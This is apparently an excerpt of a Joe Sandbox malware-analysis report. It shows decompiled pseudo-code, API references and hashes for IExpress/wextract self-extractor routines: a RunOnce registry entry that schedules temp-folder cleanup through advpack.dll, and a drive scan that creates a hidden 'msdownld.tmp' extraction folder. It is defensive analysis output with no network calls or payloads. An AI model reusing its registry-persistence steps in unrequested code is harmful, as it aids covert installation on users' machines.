                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                • Opcode ID: e0cce5e67720fa7f2a2f67cc3dd5da961f343d196c48e74fc06c2e8c02ad2b85
                                                                                                                                                                                                                                                • Instruction ID: 04f6fde143cff02d02e2d4f5bbf5456a3d22581349ce33cd9dfe88a02abdc362
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0cce5e67720fa7f2a2f67cc3dd5da961f343d196c48e74fc06c2e8c02ad2b85
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E90026435260047A7111B709D1A417B5919B4E603BC15560A511C9494DB6540445516
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0005202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v528;
                                                                                                                                                                                                                                                				void* _v532;
                                                                                                                                                                                                                                                				int _v536;
                                                                                                                                                                                                                                                				int _v540;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                                				long _t41;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                                				void _t56;
                                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                                				intOrPtr* _t72;
                                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                                				intOrPtr* _t81;
                                                                                                                                                                                                                                                				void* _t86;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				void* _t90;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                                				signed int _t93;
                                                                                                                                                                                                                                                				void* _t94;
                                                                                                                                                                                                                                                				void* _t95;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t79 = __edx;
                                                                                                                                                                                                                                                				_t28 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                                				_t84 = 0x104;
                                                                                                                                                                                                                                                				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                                				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                                				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                                				_t66 = 0;
                                                                                                                                                                                                                                                				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                                					L24:
                                                                                                                                                                                                                                                					return E00056CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(_t86);
                                                                                                                                                                                                                                                				_t87 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					E0005171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                                					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                                					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                                					if(_t41 != 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t87 = _t87 + 1;
                                                                                                                                                                                                                                                					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                                					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                                					_t79 = _t84;
                                                                                                                                                                                                                                                					E0005658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                                					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                                					_t84 = _t46;
                                                                                                                                                                                                                                                					if(_t84 == 0) {
                                                                                                                                                                                                                                                						L10:
                                                                                                                                                                                                                                                						if(GetModuleFileNameA( *0x59a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                							L17:
                                                                                                                                                                                                                                                							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                                							L23:
                                                                                                                                                                                                                                                							_pop(_t86);
                                                                                                                                                                                                                                                							goto L24;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                                						_t72 =  &_v268;
                                                                                                                                                                                                                                                						_t80 = _t72 + 1;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t49 =  *_t72;
                                                                                                                                                                                                                                                							_t72 = _t72 + 1;
                                                                                                                                                                                                                                                						} while (_t49 != 0);
                                                                                                                                                                                                                                                						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                                						_t81 = 0x591e4;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t50 =  *_t81;
                                                                                                                                                                                                                                                							_t81 = _t81 + 1;
                                                                                                                                                                                                                                                						} while (_t50 != 0);
                                                                                                                                                                                                                                                						_t84 = _t73 + 0x50 + _t81 - 0x591e5;
                                                                                                                                                                                                                                                						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x591e5);
                                                                                                                                                                                                                                                						if(_t90 != 0) {
                                                                                                                                                                                                                                                							 *0x58580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                                							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                                							if(_t66 == 0) {
                                                                                                                                                                                                                                                								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                                							E0005171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                                							_t75 = _t90;
                                                                                                                                                                                                                                                							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                                							_t79 = _t23;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t56 =  *_t75;
                                                                                                                                                                                                                                                								_t75 = _t75 + 1;
                                                                                                                                                                                                                                                							} while (_t56 != 0);
                                                                                                                                                                                                                                                							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                                							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                                							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                                							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                                							goto L23;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t79 = 0x4b5;
                                                                                                                                                                                                                                                						E000544B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                                						goto L17;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                                					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                                					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                                					if(_t91 == 0) {
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                						E0005658A( &_v268, 0x104, 0x51140);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                                				 *0x58530 = _t66;
                                                                                                                                                                                                                                                				goto L23;
                                                                                                                                                                                                                                                			}

































                                                                                                                                                                                                                                                0x000521a6
                                                                                                                                                                                                                                                0x000521a8
                                                                                                                                                                                                                                                0x000521b0
                                                                                                                                                                                                                                                0x000521b0
                                                                                                                                                                                                                                                0x000521b2
                                                                                                                                                                                                                                                0x000521b3
                                                                                                                                                                                                                                                0x000521bc
                                                                                                                                                                                                                                                0x000521c7
                                                                                                                                                                                                                                                0x000521cb
                                                                                                                                                                                                                                                0x000521f1
                                                                                                                                                                                                                                                0x000521f6
                                                                                                                                                                                                                                                0x000521fd
                                                                                                                                                                                                                                                0x000521ff
                                                                                                                                                                                                                                                0x000521ff
                                                                                                                                                                                                                                                0x00052204
                                                                                                                                                                                                                                                0x00052213
                                                                                                                                                                                                                                                0x00052218
                                                                                                                                                                                                                                                0x0005221d
                                                                                                                                                                                                                                                0x0005221d
                                                                                                                                                                                                                                                0x00052220
                                                                                                                                                                                                                                                0x00052220
                                                                                                                                                                                                                                                0x00052222
                                                                                                                                                                                                                                                0x00052223
                                                                                                                                                                                                                                                0x00052229
                                                                                                                                                                                                                                                0x0005223d
                                                                                                                                                                                                                                                0x00052249
                                                                                                                                                                                                                                                0x00052250
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052250
                                                                                                                                                                                                                                                0x000521d2
                                                                                                                                                                                                                                                0x000521d9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000521d9
                                                                                                                                                                                                                                                0x0005213a
                                                                                                                                                                                                                                                0x00052141
                                                                                                                                                                                                                                                0x00052144
                                                                                                                                                                                                                                                0x0005214c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052163
                                                                                                                                                                                                                                                0x00052172
                                                                                                                                                                                                                                                0x00052172
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052163
                                                                                                                                                                                                                                                0x000520ea
                                                                                                                                                                                                                                                0x000520f0
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00052050
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0005205F
                                                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0005208C
                                                                                                                                                                                                                                                  • Part of subcall function 0005171E: _vsnprintf.MSVCRT ref: 00051750
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000520C9
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000520EA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00052103
                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00052122
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00052134
                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00052144
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0005215B
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0005218C
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000521C1
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000521E4
                                                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0005223D
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00052249
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00052250
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                                • API String ID: 178549006-3765599613
                                                                                                                                                                                                                                                • Opcode ID: 9ce45b76fad6c23d091be6f3c8dfe4975a8cb56a2367234a57e911f8dabdecd7
                                                                                                                                                                                                                                                • Instruction ID: c879e6ff756330ac314ab4d41566cfe36b49bd319123d61a9f8a5959d9286e9c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ce45b76fad6c23d091be6f3c8dfe4975a8cb56a2367234a57e911f8dabdecd7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E511671A00614ABEB609F20DC49FEB7B7CEF56702F0042A4BE05E7191EA759D8D8B50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 232 555a0-555d9 call 5468f LocalAlloc 235 555fd-5560c call 5468f 232->235 236 555db-555f1 call 544b9 call 56285 232->236 242 55632-55643 lstrcmpA 235->242 243 5560e-55630 call 544b9 LocalFree 235->243 250 555f6-555f8 236->250 244 55645 242->244 245 5564b-55659 LocalFree 242->245 243->250 244->245 248 55696-5569c 245->248 249 5565b-5565d 245->249 255 556a2-556a8 248->255 256 5589f-558b5 call 56517 248->256 252 5565f-55667 249->252 253 55669 249->253 254 558b7-558c7 call 56ce0 250->254 252->253 257 5566b-5567a call 55467 252->257 253->257 255->256 260 556ae-556c1 GetTempPathA 255->260 256->254 270 55680-55691 call 544b9 257->270 271 5589b-5589d 257->271 264 556f3-55711 call 51781 260->264 265 556c3-556c9 call 55467 260->265 275 55717-55729 GetDriveTypeA 264->275 276 5586c-55890 GetWindowsDirectoryA call 5597d 264->276 269 556ce-556d0 265->269 269->271 273 556d6-556df call 52630 269->273 270->250 271->254 273->264 286 556e1-556ed call 55467 273->286 280 55730-55740 GetFileAttributesA 275->280 281 5572b-5572e 275->281 276->264 287 55896 276->287 284 55742-55745 280->284 285 5577e-5578f call 5597d 280->285 281->280 281->284 289 55747-5574f 284->289 290 5576b 284->290 298 55791-5579e call 52630 285->298 299 557b2-557bf call 52630 285->299 286->264 286->271 287->271 292 55771-55779 289->292 294 55751-55753 289->294 290->292 297 55864-55866 292->297 294->292 295 55755-55762 call 56952 294->295 295->290 308 55764-55769 295->308 297->275 297->276 298->290 309 557a0-557b0 call 5597d 298->309 306 557c1-557cd GetWindowsDirectoryA 299->306 307 557d3-557f8 call 5658a GetFileAttributesA 299->307 306->307 314 5580a 307->314 315 557fa-55808 CreateDirectoryA 307->315 308->285 308->290 309->290 309->299 316 5580d-5580f 314->316 
315->316 317 55827-5585c SetFileAttributesA call 51781 call 55467 316->317 318 55811-55825 316->318 317->271 323 5585e 317->323 318->297 323->297
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E000555A0(void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v265;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x58004; // 0x5a679bd9
				_v8 = _t28 ^ _t110;
				_t2 = E0005468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0005468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x59a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x58b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x58a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00056517(_t82, 0x7d2, 0, E00053210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x59a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x591e4;
									_t40 = GetTempPathA(0x104, 0x591e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00051781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00056952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0005597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00052630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0005658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                                																					_push(_t88);
                                                                                                                                                                                                                                                																					_t109 = 0x591e4;
                                                                                                                                                                                                                                                																					E00051781(0x591e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                                																					_t101 = 1;
                                                                                                                                                                                                                                                																					_t59 = E00055467(0x591e4, 1, 0);
                                                                                                                                                                                                                                                																					__eflags = _t59;
                                                                                                                                                                                                                                                																					if(_t59 != 0) {
                                                                                                                                                                                                                                                																						goto L45;
                                                                                                                                                                                                                                                																					} else {
                                                                                                                                                                                                                                                																						_t60 = _v268;
                                                                                                                                                                                                                                                																						goto L42;
                                                                                                                                                                                                                                                																					}
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                                																					_v265 = 0;
                                                                                                                                                                                                                                                																					_v268 = _t60;
                                                                                                                                                                                                                                                																					goto L42;
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				_t65 = E00052630(0,  &_v268, 1);
                                                                                                                                                                                                                                                																				__eflags = _t65;
                                                                                                                                                                                                                                                																				if(_t65 != 0) {
                                                                                                                                                                                                                                                																					goto L28;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t67 = E0005597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                                																					__eflags = _t67;
                                                                                                                                                                                                                                                																					if(_t67 == 0) {
                                                                                                                                                                                                                                                																						goto L28;
                                                                                                                                                                                                                                                																					} else {
                                                                                                                                                                                                                                                																						goto L33;
                                                                                                                                                                                                                                                																					}
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			goto L28;
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														goto L22;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L47;
                                                                                                                                                                                                                                                												L42:
                                                                                                                                                                                                                                                												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                                											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										goto L43;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t101 = 1;
                                                                                                                                                                                                                                                										_t69 = E00055467(0x591e4, 1, 3); // executed
                                                                                                                                                                                                                                                										__eflags = _t69;
                                                                                                                                                                                                                                                										if(_t69 != 0) {
                                                                                                                                                                                                                                                											goto L45;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t82 = 0x591e4;
                                                                                                                                                                                                                                                											_t70 = E00052630(0, 0x591e4, 1);
                                                                                                                                                                                                                                                											__eflags = _t70;
                                                                                                                                                                                                                                                											if(_t70 != 0) {
                                                                                                                                                                                                                                                												goto L19;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t101 = 1;
                                                                                                                                                                                                                                                												_t82 = 0x591e4;
                                                                                                                                                                                                                                                												_t71 = E00055467(0x591e4, 1, 1);
                                                                                                                                                                                                                                                												__eflags = _t71;
                                                                                                                                                                                                                                                												if(_t71 != 0) {
                                                                                                                                                                                                                                                													goto L45;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													do {
                                                                                                                                                                                                                                                														goto L19;
                                                                                                                                                                                                                                                														L43:
                                                                                                                                                                                                                                                														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                                														_push(4);
                                                                                                                                                                                                                                                														_t101 = 3;
                                                                                                                                                                                                                                                														_t82 =  &_v268;
                                                                                                                                                                                                                                                														_t44 = E0005597D(_t82, _t101, 1);
                                                                                                                                                                                                                                                														__eflags = _t44;
                                                                                                                                                                                                                                                													} while (_t44 != 0);
                                                                                                                                                                                                                                                													goto L2;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                                							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                                								_t72 = 1;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								__eflags =  *0x58b3f - _t35; // 0x0
                                                                                                                                                                                                                                                								_t72 = 0;
                                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                                									goto L10;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t101 = 0;
                                                                                                                                                                                                                                                							_t73 = E00055467(0x58b3e, 0, _t72);
                                                                                                                                                                                                                                                							__eflags = _t73;
                                                                                                                                                                                                                                                							if(_t73 != 0) {
                                                                                                                                                                                                                                                								L45:
                                                                                                                                                                                                                                                								_t38 = 1;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t101 = 0x4be;
                                                                                                                                                                                                                                                								E000544B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                								goto L2;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t101 = 0x4b1;
                                                                                                                                                                                                                                                						E000544B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						LocalFree(_t109);
                                                                                                                                                                                                                                                						 *0x59124 = 0x80070714;
                                                                                                                                                                                                                                                						goto L2;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t101 = 0x4b5;
                                                                                                                                                                                                                                                					E000544B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					 *0x59124 = E00056285();
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					_t38 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				L47:
                                                                                                                                                                                                                                                				return E00056CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                                			}





































                                                                                                                                                                                                                                                0x00055819
                                                                                                                                                                                                                                                0x0005581f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005581f
                                                                                                                                                                                                                                                0x00055791
                                                                                                                                                                                                                                                0x00055797
                                                                                                                                                                                                                                                0x0005579c
                                                                                                                                                                                                                                                0x0005579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000557a0
                                                                                                                                                                                                                                                0x000557a9
                                                                                                                                                                                                                                                0x000557ae
                                                                                                                                                                                                                                                0x000557b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000557b0
                                                                                                                                                                                                                                                0x0005579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055769
                                                                                                                                                                                                                                                0x00055762
                                                                                                                                                                                                                                                0x00055753
                                                                                                                                                                                                                                                0x0005574f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005572e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055864
                                                                                                                                                                                                                                                0x00055864
                                                                                                                                                                                                                                                0x00055864
                                                                                                                                                                                                                                                0x00055717
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000556c3
                                                                                                                                                                                                                                                0x000556c5
                                                                                                                                                                                                                                                0x000556c9
                                                                                                                                                                                                                                                0x000556ce
                                                                                                                                                                                                                                                0x000556d0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000556d6
                                                                                                                                                                                                                                                0x000556d6
                                                                                                                                                                                                                                                0x000556d8
                                                                                                                                                                                                                                                0x000556dd
                                                                                                                                                                                                                                                0x000556df
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000556e1
                                                                                                                                                                                                                                                0x000556e2
                                                                                                                                                                                                                                                0x000556e4
